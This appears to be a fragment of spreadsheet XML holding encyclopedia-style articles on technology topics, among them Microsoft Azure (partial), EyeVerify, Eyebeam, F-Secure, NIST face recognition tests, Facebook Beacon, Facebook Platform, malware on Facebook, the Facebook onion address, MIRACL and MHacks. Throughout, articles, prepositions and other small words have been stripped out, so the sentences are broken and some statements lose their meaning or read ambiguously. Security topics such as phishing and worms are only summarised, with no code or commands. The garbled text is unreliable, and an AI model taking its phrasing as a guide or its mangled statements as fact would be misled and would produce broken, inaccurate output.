communication mechanisms: event hubs, provide event telemetry ingress cloud massive scale, latency high reliability. example, event used track data cell phones coordinating real time. queues, allow one-directional communication. sender application would send message service queue, receiver would read queue. though multiple readers queue would process single message. topics, provide one-directional communication using subscriber pattern. similar queue, however, subscriber receive copy message sent topic. optionally subscriber filter messages based specific criteria defined subscriber. relays, provide bi-directional communication. unlike queues topics, relay store in-flight messages memory. instead, passes destination application. media services paas offering used encoding, content protection, streaming, analytics. global content delivery network (cdn) audio, video, applications, images, static files. used cache static assets websites geographically closer users increase performance. network managed rest-based http api.azure point presence locations worldwide (also known edge locations) april 2020. developer application insights azure devops management azure automation provides users automate manual, long-running, error-prone, frequently repeated tasks commonly performed cloud enterprise environment. saves time increases reliability regular administrative tasks even schedules automatically performed regular intervals. automate processes using runbooks automate configuration management using desired state configuration. microsoft azure microsoft azure machine learning (azure provides tools frameworks developers create machine learning artificial intelligence (ai) services. microsoft azure cognitive services prebuilt apis, sdks customizable services developers, including perceptual cognitive intelligence covering speech recognition, speaker recognition, neural speech synthesis, face recognition, computer vision, ocr/form understanding, natural language processing, machine translation, business decision services. most features appeared microsoft’s products services (bing, office, teams, xbox, windows) powered azure cognitive services. azure blockchain workbench through azure blockchain workbench, microsoft providing required infrastructure consortium network multiple topologies using variety consensus mechanisms. microsoft provides integration blockchain platforms microsoft services streamline development distributed applications. microsoft supports many general-purpose blockchains including ethereum hyperledger fabric purpose-built blockchains like corda. functions azure functions used serverless computing architectures subscribers execute code event driven function-as-a-service (faas) without managing underlying server resources. customers using azure functions billed based per-second resource consumption executions. internet things (iot) azure lets connect, monitor, manage billions assets. february 2016, microsoft announced general availability azure service. azure edge fully managed service built allows cloud intelligence deployed locally edge devices. azure central fully managed saas makes easy connect, monitor, manage assets scale. december 2017, microsoft announced public preview azure central; azure saas service. october 2017, microsoft began shipping versions official microsoft azure developer (devkit) board; manufactured mxchip. april 2018, microsoft announced launch azure sphere, end-to-end product focuses microcontroller-based devices uses linux. june 2018, microsoft launched azure edge, used azure services artificial intelligence devices. november 2018, microsoft launched open enclave cross-platform systems trustzone intel sgx. azure orbital launched september 2020, azure orbital ground station service help customers move satellite data cloud provide global cloud connectivity. private industries government agencies data collected satellites directly connect satellites cloud computing networks process analyse data. mobile cloud computing ground stations customers operate existing ground infrastructure (such energy, agricultural military) provide point-to-point cloud connectivity remote locations using third party satellite systems spacex’s starlink constellations earth orbit (leo) ses’ medium earth orbit (meo) constellation.ses deploying satellite control uplink ground stations next-generation mpower satellites alongside microsoft's data centres provide single-hop connectivity cloud remote sites.microsoft suggests satellite routing cloud offer speed advantage. example, connection home cloud data centre online media, entertainment gaming, currently complex fibre routes longer satellite again. microsoft’s experiments using xbox cloud found parts world (including parts usa) faster satellite terrestrial networks. regional expansion 2018, azure available regions, regions developed. microsoft became first large cloud provider built facilities africa, regions south africa. azure geography contains multiple azure regions, example "north europe" (dublin, ireland), "west europe" (amsterdam, netherlands). where location represents city area azure region. each azure region paired another region within geography; makes regional pair. example, amsterdam dublin locations form regional pair. middle east cloud data centers june 19th 2019, microsoft announced launch cloud regions united arab emirates microsoft’s first middle east. microsoft's management stated datacenters empower customers partners embrace benefits fourth industrial revolution achieve using cloud technologies. research partnerships microsoft partners sell products. august 2018, toyota tsusho began partnership microsoft create fish farming tools using microsoft azure application suite technologies related water management. developed part researchers kindai university, water pump mechanisms artificial intelligence count number fish conveyor belt, analyze number fish, deduce effectiveness water flow data fish provide. specific computer programs used process fall azure machine learning azure platforms. design microsoft azure uses specialized operating system, called microsoft azure, "fabric layer": cluster hosted microsoft's data centers manage computing storage resources computers provisions resources subset them) applications running microsoft azure. microsoft azure described "cloud layer" number windows server systems, windows server 2008 customized version hyper-v, known microsoft azure hypervisor provide virtualization services.scaling reliability controlled microsoft azure fabric controller, ensures services environment fail servers fails within microsoft data center, also provides management user's application memory allocation load balancing.azure provides built rest, http, allows developer interact services provided microsoft azure. microsoft also provides client-side managed class library encapsulates functions interacting services. also integrates microsoft visual studio, git, eclipse.in addition interacting services api, users manage azure services using web-based azure portal, reached general availability december 2015. portal allows users browse active resources, modify settings, launch resources, view basic monitoring data active virtual machines services. deployment models microsoft azure offers deployment models cloud resources: "classic" deployment model azure resource manager. classic model, azure resource (virtual machine, database, etc.) managed individually. azure resource manager, introduced 2014, enables users create groups related services closely coupled resources deployed, managed, monitored together. classic model slated phased future. history timeline 2005, microsoft took groove networks, bill gates made groove's founder ozzie direct reports chief technology officers. ozzie amitabh srivastava, srivastava change course. they convinced dave cutler postpone retirement teams developed cloud operating system. october 2008 (pdc announced windows azure platform. march 2009 announced azure relational database. november 2009 updated windows azure ctp, enabled full trust, php, java, more. february 2010 windows azure platform commercially available. june 2010 windows azure update, .net framework versioning, cdn, azure update. october 2010 (pdc) platform enhancements, windows azure connect, improved experience. december 2011 traffic manager, azure reporting, scheduler. june 2012 websites, virtual machines windows linux, python sdk, portal, locally redundant storage. april 2014 windows azure renamed microsoft azure, portal introduced build 2014. july 2014 azure machine learning public preview. november 2014 outage affecting major websites including msn.com. september 2015 azure cloud switch introduced cross-platform linux distribution. currently known sonic december, 2015 azure portal (codename "ibiza") released. march, 2016 azure service fabric generally available (ga) september 2017 microsoft azure gets logo manifesto july 2018 azure service fabric mesh public preview september 2018 microsoft azure central generally available (ga) october 2018 microsoft joins linux-oriented group open invention network. april 2019 azure front door service available. march 2020 microsoft said 775% increase microsoft teams usage italy covid-19 pandemic. company estimates million daily active users teams worldwide. privacy microsoft stated that, patriot act, government could access data even hosted company american data resides outside usa. manage privacy security-related concerns, microsoft created microsoft azure trust center, microsoft azure several services compliant several compliance programs including 27001:2005 hipaa. full current listing found microsoft azure trust center compliance page. special note, microsoft azure granted provisional authority operate (p-ato) u.s. government accordance guidelines spelled federal risk authorization management program (fedramp), u.s. government program provides standardized approach security assessment, authorization, continuous monitoring cloud services used federal government. significant outages following list microsoft azure outages service disruptions. certifications large variety azure certifications attained, requiring multiple successfully completed examinations. certification levels range beginner, intermediate expert. examples common certifications include: azure fundamentals azure developer associate azure administrator associate azure data engineers associate azure security engineer associate azure solutions architect expert azure devops engineer expert people dave cutler, lead developer, microsoft azure mark russinovich, cto, microsoft azure scott guthrie, executive vice president cloud group microsoft jason zander, executive vice president, microsoft azure julia white, corporate vice president, microsoft azure also cloud computing comparison comparison file hosting services azure tools teaching cbl-mariner references citations sources further reading external links official website</t>
  </si>
  <si>
    <t>EyeVerify</t>
  </si>
  <si>
    <t>eyeverify, inc. biometric security technology company based kansas city, missouri owned group. chief product, eyeprint provides verification using veins micro-features around eye. images human used authenticate mobile device users. eyeverify licenses software mobile banking applications, offered tangerine bank, ncr/digital insight wells fargo. about eyeverify part kansas city crossroads neighborhood alongside several tech companies. eyeverify's flagship product eyeprint system authenticates users recognizing patterns blood vessels visible sclera, whites eyes, well eye-based micro-features.an independent assessment ibeta determined eyeprint meets requirements inclusion built-in subsystem electronic prescription controlled substance (epcs) application. history entrepreneur toby rush founded company 2012, months visiting university missouri-kansas city professor reza derakhshani, developed vein verification technology. derakhshani holds patent eyeprint serves company's chief science officer.in september 2016, eyeverify acquired alibaba's payments arm, group $100 million. investors september 2016, group, financial services alibaba group, acquired eyeverify estimated $100m.prior that, wells fargo, sprint, qihoo samsung electronics invested million eyeverify. mid-america angels nebraska angels also investors.the company early participant wells fargo startup accelerator innovators mobile security. partners/customers financial services april 2016, tangerine bank became first canadian financial institution offer eyeprint month, wells fargo discussed summer 2016 implementation eyeprint wall street journal. large bank mentioned "tested voice facial recognition technologies found subject vagaries environment," "eyeprint works correctly often discrete."in october 2015, security added eyeprint adaptive authentication software development kit, extensive evaluation technology, provide in-app biometric step authentication high risk login transactions.eyeverify olcsan announced partnership offer eyeprint institutions turkey european countries. their first project integrate vodafone turkey's mobile wallet, vodafone cuzdan.mountain america credit union conducted beta launch eyeprint part dual biometric authentication system, making first financial institution officially launch eyeprint united states.digital insight, division ncr, announced february, 2015, would incorporate eyeprint mobile banking platform. october 2015, five digital insight financial institutions eyeprint mobile banking app: service credit union, arizona federal credit union, community america credit union, first internet bank evansville teachers federal credit union. 2016, dozens digital insight credit unions launched eyeprint id.eyeverify also partnerships technology companies serve financial services industry, including comarch, hypr bioconnect. spoofing liveness detection september 2015, youtube video posted associate eyethenticate time posting) demonstrating spoof eyeprint using version 2.3.6 demo application. play store description updated clarify demo application "includes limited liveness detection only, spoofing tests conducted relevant product sold eyeverify partners". version eyeprint integrated partners liveness detection built prevent spoofing attempts. recognition 2013, ring u.s. international winner 2014, "rookie year" "technology innovation," compass intelligence mobility awards 2015, 2015 "cool vendor" mobile wireless, gartner 2016, "best show" finovateeurope. 2016, "best show finovateasia. references</t>
  </si>
  <si>
    <t>Eyebeam (organization)</t>
  </si>
  <si>
    <t>eyebeam not-for-profit technology center york city, founded john seward johnson co-founders david johnson roderic richardson. originally conceived digital effects coding atelier center youth education, eyebeam become center research, development, curation media works open source technology. eyebeam annually hosts residents co-produces youth educational programs, exhibitions, performances, symposia, workshops, hackathons events residents well partner organizations. projects developed eyebeam received awards recognition including webby awards, guggenheim fellowships, prix electronica. history eyebeam, originally called eyebeam atelier, first conceived collaboration david johnson, digital artist, john seward johnson iii, filmmaker philanthropist. introduced roderic richardson, mutual friend recognized shared interests helped establish venture early stages. inspiration name project eyebeam atelier came partly sculpture atelier john johnson's father, john seward johnson experiments technology collective, although david johnson also used name eyebeam simulations start-up location-based entertainment concept meeting roderic john johnson. after observing media growing genre, co-founders motivated create similar studio. they recognized need provide artists digital film artists access technology shared workspace.in addition offering resources media artists, johnson need provide middle high school students educational artistic opportunities. digital camp, first youth program catered media education, founded 1998; pilot program, york-based high school students learned development design. future sessions included project-based learning around themes bioart, urban interventionism, game design, wearable technology. eyebeam's first forum, "interaction", took place online summer 1998 curated ucsd professor jordan crandall. forum, email list called &lt;eyebeam&gt;&lt;blast&gt;, hosted brian holmes, oguibe, gregory ulmer, included manovich, katherine hayles, saskia sassen, matthew slotover, goldberg, geert lovink, knowbotic research, hans-ulrich obrist, bracha lichtenberg ettinger, mark tribe, critical ensemble among participating artists, educators, media internet theorists, technologists (cite). discussions spurred &lt;eyebeam&gt;&lt;blast&gt; compiled book titled interaction: artistic practice network published 2001.in addition funding artistic research, johnson hoped develop eyebeam space would also function museum devoted media works. 2000, eyebeam announced international architectural competition construct space devoted dialog technology, design firm diller scofidio's "olympic class" design named winner competition.eyebeam held first open studios artists residence fellows 2002. alexander galloway, hovagimyan, tony martin, yael kanarek, mtaa, john klima, cohen, cory arcangel, michael bell-smith among inaugural exhibitors. among projects display galloway's carnivore, processing library allowed creative misuse data surveillance created tandem members radical software group. carnivore takes name function dcs1000, surveillance system used united states federal bureau investigation. carnivore awarded prix electronica golden nica year.residents yury gitman carlos gomez llarena's noderunner, scavenger hunt based wi-fi sharing, received 2003 prix electronica golden nica. fundrace.org, site allows visitors track campaign contributions geocoding, developed jonah peretti, then-director research development eyebeam, later adapted permanent feature huffington post. peretti, together alexander galloway, collaborated reblog, first blogging platform allows users filter publish content many feeds. beginning 2005, eyebeam reblog began feature eyebeam journal, series in-depth writings interviews resident artists, research fellows, guest contributors. during fellowships, theo watson zachary lieberman continued develop openframeworks, c/c++ library originally created parsons. together processing, openframeworks became popular platforms creative coding.the eyebeam openlab served birthplace graffiti research lab. founded james powderly evan roth openlab fellowships 2005, envisioned nonprofit design studio creating experimental technologies street applications. while eyebeam, powderly roth developed method creating graffiti messages individual lights system projecting shapes drawn handheld laser real time. powderly roth later founded f.a.t. (free technology) lab, collective dedicated merging open source technology popular culture, theo watson, chris sugrue, others.eyebeam expanded programmatic lineup exhibitions workshops mixer, series dedicated showcasing leading performance artists field live video audio, late 2007. inaugural event, "brother islands (places lose people)", focused around immersive experimental documentary north brother island wards island media artist benton bainbridge. mixer events organized around themes disparate world's fair, 2010 winter olympics, york city's underground featured interactive installations alongside performances musicians performance artists including dām-funk, extreme animals, cheryl, d-fuse that year, fellows resident artists began organizing mobile workshops talks. 2011, several eyebeam residents, fellows, alumni participated talk design communication people objects museum modern york city. eyebeam fellow ayah bdeir's littlebits, open source pre-assembled circuits, among projects displayed acquired moma part permanent collection.in february 2014 first ever feminism wikipedia edit-a-thon hosted eyebeam co-organized fellow laurel ptak conjunction satellite edit-a-thons internationally across united states, canada, australia, italy, netherlands, united kingdom. since november 2017 eyebeam located cook street brooklyn. this coincides 20th anniversary organization celebrated spring 2018. directors john seward johnson iii: 1997–2004 steven tremble: 2004–2005 amanda mcdonald crowley: 2005–2011 patricia jones: 2011–2015 roddy schrock: 2015–present also electronica center center media eyewriter free technology (aka "fat lab") graffiti research kitchen budapest openframeworks institute unstable media references external links official website</t>
  </si>
  <si>
    <t>F-Secure</t>
  </si>
  <si>
    <t>f-secure corporation (formerly data fellows) global cyber security privacy company offices around world headquartered helsinki, finland. company nearly offices around globe presence countries, security operations helsinki kuala lumpur, malaysia. company develops sells antivirus, password management, endpoint security, consulting services cyber security products services. with rapid detection response (edr) f-secure countercept (mdr) flagship offerings, company continues expand corporate market. history f-secure first established name data fellows petri allas risto siilasmaa 1988. data fellows trained computer users built customized databases. three years later, company launched first major software project developed first heuristic scanner antivirus products. f-secure’ first antivirus product windows launched 1994. data fellows became f-secure 1999. f-secure first company developed anti-rootkit technology called blacklight 2005.in june 2015, f-secure expanded enterprise market acquiring nsense, danish company specializes security consultation vulnerability assessment. purchase inverse path, privately owned italian security consultancy experience avionics, automative, industrial control sectors.f-secure client security received av-test best protection award fifth time 2016.in june 2018, f-secure acquired security company infosecurity million pounds ($106 million). f-secure gained consulting business (now f-secure consulting), threat hunting product, countercept (now f-secure managed detection response), suite phishing protection services, phishd.february 17th 2022, f-secure announced demerger corporate consumer businesses. conjunction demerger, company renamed withsecure corporation (“withsecure”). consumer security business transferred independent company continue using name f-secure corporation. demerger came effect july 1st, 2022, f-secure listed nasdaq helsinki corporate business completely separated company. academia co-operation aalto university school science technology, f-secure runs one-semester course future virus analysts, material available online. controversies after media coverage magic lantern claims vendors purposely leave backdoor products, f-secure announced policy detecting spying programs: "f-secure corporation would like make known leave backdoors f-secure anti-virus products, regardless source tools. draw line every sample regarding whether detect not. this decision-making influenced technical factors, nothing else, within applicable laws regulations, case meaning laws. also adding detection program might used terrorist activity benefit organized crime. would like state record, received queries regarding whether would guts detect something obviously made known violent mafia terrorist organization. would." also internet security comparison antivirus software comparison computer viruses references external links official website</t>
  </si>
  <si>
    <t>Face Recognition Vendor Test</t>
  </si>
  <si>
    <t>face recognition vendor test (frvt) series large scale independent evaluations face recognition systems realized national institute standards technology 2000, 2002, 2006, 2010, 2013 2017. previous evaluations series face recognition technology (feret) evaluations 1994, 1995 1996. project ongoing status periodic reports, continues grow scope. includes tests face-in-video-evaluation (five), facial morphing detection, testing demographic effects (e.g., age, gender, race). face recognition vendor test 2006 primary goal frvt 2006 measure progress prototype systems/algorithms commercial face recognition systems since frvt 2002. frvt 2006 evaluated performance high resolution still imagery mega-pixels) facial scans multi-sample still facial imagery pre-processing algorithms compensate pose illuminationto guarantee accurate assessment, frvt 2006 measured performance sequestered data (data previously seen researchers developers). standard dataset test methodology employed participants evenly evaluated. government provided test data test environment participants. test environment called biometric experimentation environment (bee). frvt 2006 infrastructure. allowed experimenter focus experiment simplifying test data management, experiment configuration, processing results. frvt 2006 sponsored multiple u.s. government agencies conducted managed national institute standards technology (nist). goals frvt 2006 independently determine objectives face recognition grand challenge (frgc) achieved. frgc separate algorithm development project designed promote advance face recognition technology supports existing face recognition efforts u.s. government. objectives frgc develop face recognition algorithms capable performance order magnitude better frvt 2002. frgc conducted 2004 march 2006. frgc data still available face recognition researchers. obtain frgc data, potential participants must sign required licenses follow frgc data release rules. request frgc data set, please follow directions found "frgc webpage." frvt 2006 protocol frvt 2006 protocol frvt 2006 executable calling signatures frvt 2006 executable naming convention frvt 2006 results frvt 2006 large-scale results available combined frvt 2006 2006 large-scale results evaluation report. assesses algorithms based input organizations different countries, many submitting multiple algorithms. however, successfully completed large-scale tests documented report. report shows error rates best algorithms improved orders magnitude years, false rejection rate (frr) 0.79 false acceptance rate (far) 0.001 1993, frr=0.01 far=0.001 2006. part improvement higher quality face images. best results 2006 "very high-resolution still images" images. face recognition prize challenge 2017 face recognition prize challenge (frpc) assessed face recognition algorithms photographs collected without tight quality constraints, e.g. images collected individuals cooperating know photographed. prized awarded verification identification. best verification algorithm false non-match rate fnmr 0.22 false match rate 0.001. prizes also awarded speed verification cooperative portrait photos. face recognition vendor test (frvt) ongoing frvt ongoing roughly face recognition algorithms tests least collections photographs multiple photographs million people. best algorithms verification gives false match rates 0.0003 false match rates 0.0001 high quality visa images.additional programs: frvt: demographic effects effects demographic differences (e.g., age, gender, race) algorithm performance. frvt morph detection facial morphing, especially pertains photo-credential issuance. face challenges recognition individuals photographs posted social media. face video evaluation (five) ability algorithms identify ignore persons video sources, many times person actively cooperating purposes facial recognition, i.e. wild". sponsors intelligence advanced research projects agency (iarpa) department homeland security (dhs) criminal justice information services division technical support working group (tswg) national institute justice references external links mbgc website mbgc blog frgc website frvt website frvt 2006 2006 large-scale results website national institute standards technology intelligence advanced research projects agency department homeland security criminal justice information services division technical support working group (tswg) national institute justice</t>
  </si>
  <si>
    <t>Facebook Beacon</t>
  </si>
  <si>
    <t>beacon formed part facebook's advertisement system sent data external websites facebook, purpose allowing targeted advertisements allowing users share activities friends. beacon reported facebook facebook's members' activities third-party sites also participated beacon. these activities published users' news feed. this occurred even users connected facebook, happened without knowledge facebook user. service controversial became target class-action lawsuit, resulting shutting september 2009. main concerns beacon give user option block information sent facebook. beacon launched november 2007, partner websites. mark zuckerberg, facebook, characterized beacon facebook blog november 2011 "mistake." although beacon unsuccessful, pave facebook connect, become widely popular. privacy concerns litigation beacon created considerable controversy soon launched, privacy concerns. november 2007, civic action group moveon.org created facebook group online petition demanding facebook publish activity websites without explicit permission user. fewer days, group gained 50,000 members. after class-action lawsuit, lane facebook, inc., beacon changed require actions transmitted website would approved facebook user published. november 2007, stefan berteau, security researcher computer associates, published note tests beacon system. found data still collected sent facebook despite users' opt-outs logged facebook time. this revelation direct contradiction statements made chamath palihapitiya, facebook's vice president marketing operations, interview york times published day: tickets fandango, decline publish purchase friends facebook, facebook still receive information purchase? "absolutely not. things still trying dispel misinformation propagated unnecessarily." november 2007, louise story york times blogged received impression beacon would explicit opt-in program, coca-cola also similar impression, result, chosen withdraw participation beacon.on december 2007, facebook announced would allow people opt-out beacon. founder mark zuckerberg apologized controversy. this philosophy behind recent changes. last week changed beacon opt-in system, today we're releasing privacy control turn beacon completely. find here. select want share beacon actions turn beacon, facebook store actions even partners send facebook. september 2009, facebook announced would shut service.on october 2009, class action notice sent facebook users used beacon. proposed settlement would require facebook $9.5 million settlement fund. named plaintiffs (approximately would awarded total $41,000, remainder consisting legal fees. technology facebook beacon worked third-party site facebook cookies. clearing facebook cookies browser explicitly logging facebook prevented third-party site knowing user's facebook identity. lawsuit settlement part class action settlement, facebook terminated beacon. facebook also required court order notify users settlement. facebook million fund establish independent non-profit foundation identify fund projects initiatives promote cause online privacy, safety, security. facebook also website lawsuit. under contingency arrangement plaintiffs, firms filed case would fee, likely $3–$4 million, average facebook user would receive monetary award. facebook notified users court order. facebook received intense criticism beacon. case ended permanent termination system establishment privacy foundation. before beacon terminated, people beacon organized class action lawsuit. settling case, facebook finally paid $9.5 million total resolve privacy concerns around users. established non-profit foundation called digital trust foundation $6.5 million, aiming "fund sponsor programs designed educate users, regulators enterprises regarding critical issues relating protection identity personal information online". around million distributed original plaintiffs attorneys. class action organizers made objection supreme court, arguing members class action received little money settlement result donating newly founded charity. person also raised issue settlement unfair facebook still controlled foundation since employee facebook charge response challenge settlement, facebook explained direct payment would wise decision compared setting foundation. each potential plaintiff would share tiny amount money divided huge number class action members. thus, money used founding relevant non-profit organization educate people privacy issues seemed better-off deal serving interests. significance beacon, recommendation trusted friend" referred mark zuckerberg, raised ongoing concerns regarding user privacy social media sites outraged privacy advocates. beacon hurt facebook's reputation violating software engineering tenets disrespecting privacy rights users. since failure launching beacon, facebook mired controversy terms privacy issues. beacon stories many internet surfers believe "facebook profit-oriented social networking sites large internet-based surveillance machines."in general, beacon viewed mistake appeared explicit intentions inscribed protocol. learning unsuccessful experience, facebook seeking ways monetize user database social advertising. unlike beacon, process commercialization tends happen back-end system thus becoming invisible users. way, resistance user population could largely removed. specific, argue facebook beacon paved subsequent service, facebook connect, adopting idea utilizing third-party data. also criticism facebook facebook analytics facebook like button facebook pixel transparent society david brin references external links york times blog post showing changes beacon time</t>
  </si>
  <si>
    <t>Facebook Platform</t>
  </si>
  <si>
    <t>facebook platform services, tools, products provided social networking service facebook third-party developers create applications services access data facebook.the current facebook platform launched 2010. platform offers programming interfaces tools enable developers integrate open "social graph" personal relations things like songs, places, facebook pages. applications facebook.com, external websites, devices allowed access graph. history facebook launched facebook platform 2007, providing framework software developers create applications interact core facebook features. markup language called facebook markup language introduced simultaneously; used customize "look feel" applications developers create. prior facebook platform, facebook built many applications within facebook website, including gifts, allowing users send virtual gifts other, marketplace, allowing users post free classified ads, facebook events, giving users method informing friends upcoming events, video, letting users share homemade videos another, social network game, users connections friends help advance games playing. facebook platform made possible outside partners build similar applications. many popular early social network games would combine capabilities. instance, early games reach application spot, (lil) green patch, combined virtual gifts event notifications friends contributions charities causes. third party companies provide application metrics, several blogs arose response clamor facebook applications. july 2007, altura ventures announced "altura facebook investment fund," becoming world's first facebook-only venture capital firm.on august 2007, facebook changed popularity applications measured, give attention engaging applications, following criticism ranking applications number people installed application giving advantage highly viral, useless applications. tech blog valleywag criticized facebook applications, labeling "cornucopia uselessness." others called limiting third-party applications facebook user experience degraded.applications created platform include chess, allow users play games friends. games, user's moves saved website, allowing next move made time rather immediately previous move.by november 2007, seven thousand applications developed facebook platform, another hundred created every day. second annual developers conference july 2008, number applications grown 33,000, number registered developers exceeded 400,000.within months launching facebook platform, issues arose regarding "application spam", involves facebook applications "spamming" users request installed.facebook integration announced xbox nintendo june 2009 november 2009, sony announced integration facebook deliver first phase variety features connect enhance online social experiences playstation february 2010, facebook announced release hiphop opensource project. mark zuckerberg said team facebook developing facebook search engine. “facebook pretty well placed respond people’s questions. point, will. team working it", said mark zuckerberg. him, traditional search engines return many results necessarily respond questions. “the search engines really need evolve answers: specific question, answer question me.'" june 2014, facebook announced haxl, haskell library simplified access remote data, databases web-based services. partnerships device manufacturers starting 2007, facebook formed data sharing partnerships least handset manufacturers, including apple, amazon, blackberry, microsoft samsung. those manufacturers provided facebook user data without users' consent. most partnerships remained place 2018, partnerships first publicly reported. high-level platform components graph graph core facebook platform, enabling developers read write data facebook. graph presents simple, consistent view facebook social graph, uniformly representing objects graph (e.g., people, photos, events, pages) connections (e.g., friend relationships, shared content, photo tags). authentication facebook authentication enables developers’ applications interact graph behalf facebook users, provides single-sign mechanism across web, mobile, desktop apps. social plugins social plugins including like button, recommendations, activity feed enable developers provide social experiences users lines html. social plugins extensions facebook designed user data shared sites appear. hand, social plugins facebook track users’ browsing habits sites feature plugins. open graph protocol open graph protocol enables developers integrate pages facebook's global mapping/tracking tool social graph. these pages gain functionality graph objects including profile links stream updates connected users. opengraph tags html5 might look like this: iframes facebook uses iframes allow third-party developers create applications hosted separately facebook, operate within facebook session accessed user's profile. since iframes essentially nest independent websites within facebook session, content distinct facebook formatting. facebook originally used 'facebook markup language (fbml)' allow facebook application developers customize "look feel" applications, limited extent. fbml specification encode content facebook's servers read publish needed facebook-specific feed facebook's system properly parse content publish specified. fbml application cached facebook subsequent call replaces facebook also offers specialized facebook javascript (fbjs) library.facebook stopped accepting fbml applications march 2011, continued support existing fbml tabs applications. since january 2012 fbml longer supported, fbml longer functioned june 2012. facebook connect facebook connect, also called facebook, like openid, authentication apis facebook developers help users connect share users' facebook friends facebook) increase engagement website application. when used, facebook members third-party websites, applications, mobile devices gaming systems facebook identity and, logged connect friends media post information updates facebook profile. originally unveiled facebook’s developer conference, july 2008, facebook became generally available december 2008. according article york times, "some services representative surprising thinking silicon valley. instead trying hoard information users, internet companies (including facebook, google, myspace twitter) share least data people enter identifying information different sites."log facebook cannot used users locations cannot access facebook, even third-party site otherwise accessible location.according facebook, users logged huffington post facebook spent time site average user. microformats february 2011, facebook began hcalendar microformat mark events, hcard events' venues, enabling extraction details users' calendar mapping applications. mobile platform framework mobile website based xhp, javelin javascript library, wurfl. mobile platform grown dramatically popularity since launch. december 2012, number users signing site mobile devices exceeded web-based logins first time. reception many facebook application developers attempted create viral applications. stanford university even offered class fall 2007, entitled computer science (cs) 377w: "create engaging applications using metrics learning facebook". numerous applications created class highly successful, ranked amongst facebook applications, achieving million users month.in 2011, guardian expressed concerns users publishing content third party provider exposed losing positioning service removed; open graph could force connecting presence facebook social services even people using publishing channels. june 2018, york times criticized facebook's partnerships device manufacturers, writing data available manufacturers "raise concerns company's privacy protections compliance 2011 consent decree federal trade commission." also facebook features distributed social networking software protocols references external links</t>
  </si>
  <si>
    <t>Facebook malware</t>
  </si>
  <si>
    <t>social media platform social networking service facebook affected multiple times history intentionally harmful software. known malware, pose particular challenges users platform well personnel tech-company itself. fighting entities create topic ongoing malware analysis. types malware notable incidents attacks known phishing, attacker pretends trustworthy entity order solicit private information, increased exponentially 2010s posed frustrating challenges. facebook particular, tricks involving urls common; attackers maliciously similar website http://faceb0ok.com/ instead correct http://facebook.com/, example. 11th international conference detection intrusions malware, vulnerability assessment (dimva), held july 2014, issued report condemning "common tricks" mobile computing users especially vulnerable to.in terms applications, facebook also visually copied phishing attackers, confuse individuals thinking something else legitimate facebook log-in screen.in 2013, variant "dorkbot" malware caused alarm spreading facebook's internal chat service. with suspected efforts cybercriminals harvest users' passwords affecting individuals nations germany, india, portugal, united kingdom. antivirus organization bitdefender discovered several thousand malicious links taking place twenty-four hour period, contacted facebook administration problem. while infection contained, unusual nature sparked interest given attackers exploited flaw file-sharing site mediafire proliferate phony applications among victims' facebook friends.the real computer worm "koobface", surfaced 2008 messages sent facebook myspace, later became subject inflated, grandiose claims effects spread point internet hoax. later commentary claimed link malware messages barack obama administration never actually existed. david mikkelson snopes.com discussed matter fact-checking article.on july 2022, researchers withsecure discovered cybercriminal operation targeting digital marketing human resources professionals effort hijack facebook business accounts using data-stealing malware.they dubbed campaign 'ducktail' found evidence suggest vietnamese threat actor developing distributing malware motives appeared purely financially driven. responses individual efforts vein actions google microsoft, company's administration willing hire "grey hat" hackers, acted legally ambiguously past, assist various functions. programmer social activist george hotz (also known nickname "geohot") example. bounty program july 2011, facebook announced effort called "bug bounty program" certain security researchers paid minimum $500 reporting security holes facebook's website itself. company's official page security researchers stated, give reasonable time respond report making information public make good faith effort avoid privacy violations, destruction data, interruption degradation service research, bring lawsuit enforcement investigate you." effort attracted notice publications magazine, noted individuals must first report security glitch must also find problem native facebook (rather entity merely associated farmville). targeting specific users late 2017, facebook systematically disabled accounts operated north koreans response government's state-sponsored malware attacks. microsoft similar actions. north korean government attracted widespread condemnation u.s. elsewhere alleged proliferation "wannacry" malware. said computer worm affected 230,000 computers countries throughout 2017. also facebook criticism facebook history facebook issues involving social networking services privacy concerns facebook malware browser hijacking computer worm malware analysis mobile malware phishing security engineering references</t>
  </si>
  <si>
    <t>Facebook onion address</t>
  </si>
  <si>
    <t>facebook onion address located facebookwkhpilnemxj7asaniu7vnjjbiltxjqhye3mhbshg7kx5tfyd.onion (formerly facebookcorewwwi.onion) site allows access facebook protocol, using .onion top-level domain. purported benefits prior release official .onion domain, accessing facebook would sometimes lead error messages inability access website. propublica explicitly referenced existence facebook's .onion site started onion service.the site also makes easier facebook differentiate accounts caught botnet legitimately access facebook tor. 2014 release, site still early stages, much work remaining polish code access. speculated companies follow suit release tor-accessible sites. history october 2014, facebook announced users could connect website onion service using privacy-protecting browser encrypted using https. announcing feature, alec muffett said "facebook's onion address provides access facebook without losing cryptographic protections provided cloud. provides end-to-end communication, browser directly facebook datacentre." network address used time facebookcorewwwi.onion backronym stands facebook's core infrastructure.in april 2016, used million people monthly, 525,000 2015. google operate sites tor, facebook applauded allowing access, makes available countries actively block facebook.in 2021 updated onion version address facebookwkhpilnemxj7asaniu7vnjjbiltxjqhye3mhbshg7kx5tfyd.onion. this project's planned july 2021 deprecation addresses inherent crackability using brute-force attacks modern hardware exist time introduction (many private keys known equal address hash collision). references external links official site (accessing link help)</t>
  </si>
  <si>
    <t>MIRACL (security firm)</t>
  </si>
  <si>
    <t>miracl (formerly known certivox) london-based security firm develops information security infrastructure service (iaas) encryption based software service (saas) solutions enterprises individuals. company provides on-demand encryption management multi-factor authentication cloud, specializes elliptical curve cryptography. herring selected miracl finalist 2012 europe 100. history brian spector founded certivox. company opened offices shoreditch 2011.the company partnered low-power customer specific standard product (cssp) provider quicklogic february 2012, efforts jointly develop data security solutions across platforms. also february, company acquired shamus software, creator miracl cryptographic library.in 2011, certivox received $1.46 million series funding pentech ventures octopus investments.in 2012 launched service called privatesky allowing users encrypt messages large files 5gb. design offered government, businesses, individuals one-click security microsoft outlook. html5 browsers. however privatesky taken offline company following ripa warrant gchq's national technical assistance centre (ntac) wanted decryption keys customer data.certivox launched m-pin strong authentication system july 2013.in january 2016, company changed name miracl. name acronym multiprecision integer rational arithmetic cryptographic library, created dublin city university school computing 1988 company acquired purchase shamus software 2012. reason given name change reflect pivot mission business, providing individual products offering complete solutions potential transform industry”."certivox announces company name change miracl". references</t>
  </si>
  <si>
    <t>MHacks</t>
  </si>
  <si>
    <t>mhacks semiannual student-run hackathon held university michigan. 36-hour event brings students across world develop creative solutions latest technology, including software hardware based solutions. mhacks open students around world majors requires prior coding experience. history founding mhacks founded michelle thomas erdmann, adam williams, friedman, dave fontenot, inspired create event attending pennapps hackathon. references</t>
  </si>
